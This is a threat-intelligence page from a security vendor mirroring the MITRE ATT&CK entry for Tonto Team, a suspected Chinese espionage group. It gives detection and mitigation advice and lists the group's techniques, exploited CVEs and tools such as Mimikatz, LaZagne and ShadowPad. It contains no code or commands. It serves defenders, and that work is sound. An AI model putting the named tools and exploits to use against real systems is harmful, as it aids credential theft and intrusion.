Live Active security incident? Get immediate response
MITRE ATT&CK® Group

G0131: Tonto Team

Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).[1][2][3][4][5][6]

EnterpriseG0131GroupObject v1.1 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

Tonto Team matters as a long-running espionage-focused intrusion set with reported targeting across government, military, energy, mining, financial, education, healthcare, and technology sectors in South Korea, Japan, Taiwan, the United States, and later other Asian and Eastern European countries. For leaders, the practical takeaway is not a single indicator or tool, but a pattern: initial access through malicious files and exploitation, followed by credential theft, discovery, remote access tooling, web shells, and command-and-control behaviors that can support persistent access to sensitive environments.

Executive priority

Prioritize this as an espionage-readiness and resilience issue where the organization has sensitive government, defense, energy, mining, financial, healthcare, education, or technology data, or regional exposure matching the ATT&CK description. Executives should ask whether identity controls, vulnerability management, email/file defenses, web server monitoring, endpoint telemetry, and incident response playbooks can prove coverage for credential dumping, web shells, lateral movement via remote service exploitation, and command-and-control through proxies. The decision value is in validating control depth across the intrusion lifecycle, not in assuming the group is currently targeting the organization.

Technical view

ATT&CK does not provide a detection section for this group, so SOC and IR teams should map detections from the related techniques and software. Validate visibility for spearphishing attachments and malicious file execution, PowerShell and Python execution, privilege escalation exploitation, local group and network share discovery, credential dumping tools such as Mimikatz, gsecdump, and LaZagne, internal reconnaissance with tools such as NBTscan, RAT/backdoor activity associated with Bisonal and ShadowPad, web shell persistence, ingress tool transfer, external proxy use, and remote service exploitation. Because the group object itself has no specified platforms or tactics, platform assumptions should be derived only from the related technique and software objects and then confirmed against the local environment.

Likely telemetry

  • Email security and attachment detonation results for targeted malicious files
  • Endpoint process creation, command-line, script execution, and parent-child process telemetry for PowerShell, Python, DLL abuse, and tool execution
  • Credential access signals, including LSASS access, hash/secret dumping behavior, and stored password recovery tool activity
  • Windows event logs and EDR telemetry for local group enumeration, network share discovery, and lateral movement attempts
  • Network telemetry for SMB/share enumeration, remote service exploitation patterns, tool transfer, and unusual internal reconnaissance

Detection direction

  • Build behavior-based coverage around the related ATT&CK techniques rather than relying only on group or malware names.
  • Correlate suspicious attachment execution or client-side exploitation with subsequent script execution, credential dumping, discovery, and outbound command-and-control behavior.
  • Tune credential dumping detections to separate legitimate administrative or security testing activity from unexpected access to credential material, especially on Windows systems referenced by several related tools.
  • Review web server monitoring for unexpected script files, unusual child processes spawned by web services, and anomalous external access patterns consistent with web shell persistence.
  • Validate that network discovery detections cover both normal administrative tooling and open-source reconnaissance tools such as NBTscan, with allowlists for approved scanning activity.

Mitigation priorities

  • Start with exposure reduction for likely entry and escalation paths: patch client applications, internet-facing services, and remote services; prioritize vulnerabilities that enable execution or privilege escalation.
  • Strengthen email and file handling controls for malicious attachments, including user reporting workflows and safe execution analysis where available.
  • Reduce credential theft impact through least privilege, privileged access management, credential hygiene, and restrictions on where administrative credentials can be used.
  • Harden and monitor scripting environments such as PowerShell and Python according to business need, with logging enabled where feasible.
  • Limit lateral movement by reducing unnecessary shares and remote services, segmenting sensitive systems, and enforcing strong authentication for administrative access.
Analyst notes and limits

The strongest defensive value comes from the relationship set: Tonto Team is associated with credential dumping, keylogging, scripting, exploitation, discovery, tool transfer, web shells, proxy-based C2, and several public or named tools. These relationships support a coverage assessment across identity, endpoint, email, network, web server, vulnerability management, and IR processes. The official group description supports sector and regional relevance, but local risk should be based on the organization’s footprint, data sensitivity, and exposed attack surface.

The supplied ATT&CK group object has no official detection text, no group-level platforms, and no group-level tactics. The summary therefore uses the official description, aliases, external references, and relationship context only. It does not assert current activity, customer exposure, confirmed attribution beyond MITRE’s wording of suspected Chinese state sponsorship, or guaranteed detection coverage.

Official MITRE ATT&CK definition

Tonto Team

Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).[1][2][3][4][5][6]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

15 rows
Domain ID Name Relationship / procedure
Enterprise T1135 Network Share Discovery

Tonto Team has used tools such as NBTscan to enumerate network shares.CitationTrendMicro Tonto Team October 2020
Enterprise T1574.001 DLL Sub-technique

Tonto Team abuses a legitimate and signed Microsoft executable to launch a malicious DLL.CitationESET Exchange Mar 2021
Enterprise T1090.002 External Proxy Sub-technique

Tonto Team has routed their traffic through an external server in order to obfuscate their location.CitationTrendMicro Tonto Team October 2020
Enterprise T1059.006 Python Sub-technique

Tonto Team has used Python-based tools for execution.CitationTrendMicro Tonto Team October 2020
Enterprise T1069.001 Local Groups Sub-technique

Tonto Team has used the ShowLocalGroupDetails command to identify administrator, user, and guest accounts on a compromised host.CitationTrendMicro Tonto Team October 2020
Enterprise T1056.001 Keylogging Sub-technique

Tonto Team has used keylogging tools in their operations.CitationTrendMicro Tonto Team October 2020
Enterprise T1003 OS Credential Dumping

Tonto Team has used a variety of credential dumping tools.CitationTrendMicro Tonto Team October 2020
Enterprise T1505.003 Web Shell Sub-technique

Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server.CitationESET Exchange Mar 2021
Enterprise T1203 Exploitation for Client Execution

Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.CitationKaspersky CactusPete Aug 2020CitationTrendMicro Tonto Team October 2020CitationTalos Bisonal Mar 2020CitationTalos Bisonal 10 Years March 2020
Enterprise T1204.002 Malicious File Sub-technique

Tonto Team has relied on user interaction to open their malicious RTF documents.CitationTrendMicro Tonto Team October 2020CitationTalos Bisonal Mar 2020
Enterprise T1566.001 Spearphishing Attachment Sub-technique

Tonto Team has delivered payloads via spearphishing attachments.CitationTrendMicro Tonto Team October 2020
Enterprise T1210 Exploitation of Remote Services

Tonto Team has used EternalBlue exploits for lateral movement.CitationTrendMicro Tonto Team October 2020
Enterprise T1059.001 PowerShell Sub-technique

Tonto Team has used PowerShell to download additional payloads.CitationESET Exchange Mar 2021
Enterprise T1068 Exploitation for Privilege Escalation

Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges.CitationTrendMicro Tonto Team October 2020
Enterprise T1105 Ingress Tool Transfer

Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.CitationESET Exchange Mar 2021
Associated objects

Groups, software, and campaigns

Tool Enterprise

S0002: Mimikatz

Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [1] [2]

Windows
Malware Enterprise

S0268: Bisonal

Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.[1][2]

Windows
Malware Enterprise

S0596: ShadowPad

ShadowPad is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by APT41, but has since been observed to be used by various Chinese threat activity groups. [1][2][3]

Windows
Tool Enterprise

S0349: LaZagne

LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[1]

LinuxmacOSWindows
Tool Enterprise

S0008: gsecdump

gsecdump is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. [1]

Windows
Relationship explorer

All related ATT&CK context

uses · Technique T1135: Network Share Discovery Enterprise uses · Technique T1574.001: DLL Enterprise uses · Technique T1090.002: External Proxy Enterprise uses · Technique T1059.006: Python Enterprise uses · Tool S0002: Mimikatz Enterprise uses · Technique T1069.001: Local Groups Enterprise uses · Malware S0268: Bisonal Enterprise uses · Technique T1056.001: Keylogging Enterprise uses · Malware S0596: ShadowPad Enterprise uses · Technique T1003: OS Credential Dumping Enterprise uses · Technique T1505.003: Web Shell Enterprise uses · Tool S0349: LaZagne Enterprise uses · Technique T1203: Exploitation for Client Execution Enterprise uses · Technique T1204.002: Malicious File Enterprise uses · Tool S0590: NBTscan Enterprise uses · Technique T1566.001: Spearphishing Attachment Enterprise uses · Technique T1210: Exploitation of Remote Services Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1068: Exploitation for Privilege Escalation Enterprise uses · Technique T1105: Ingress Tool Transfer Enterprise uses · Tool S0008: gsecdump Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.1
Created
Modified
Raw hash
ceb4d4e9ea661775...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.1 Current bundle ceb4d4e9ea66…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Kaspersky CactusPete Aug 2020

    Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.

    Open source URL
  2. [2]
    ESET Exchange Mar 2021

    Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.

    Open source URL
  3. [3]
    FireEye Chinese Espionage October 2019

    Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved November 17, 2024.

    Open source URL
  4. [4]
    ARS Technica China Hack SK April 2017

    Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.

    Open source URL
  5. [5]
    Trend Micro HeartBeat Campaign January 2013

    Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.

    Open source URL
  6. [6]
    Talos Bisonal 10 Years March 2020

    Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.

    Open source URL
  7. [7]
    BRONZE HUNTLEY

    (Citation: Secureworks BRONZE HUNTLEY )

  8. [8]
    CactusPete

    (Citation: Kaspersky CactusPete Aug 2020)

  9. [9]
    CrowdStrike Manufacturing Threat July 2020

    Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.

    Open source URL
  10. [10]
    Earth Akhlut

    (Citation: TrendMicro Tonto Team October 2020)

  11. [11]
    Karma Panda

    (Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020)

  12. [12]
    Secureworks BRONZE HUNTLEY

    Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.

    Open source URL
  13. [13]
    Talos Bisonal Mar 2020

    Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.

    Open source URL
  14. [14]
    Tonto Team

    (Citation: Talos Bisonal Mar 2020)

  15. [15]
    TrendMicro Tonto Team October 2020

    Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.

    Open source URL
  16. [16]
    mitre-attack G0131
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use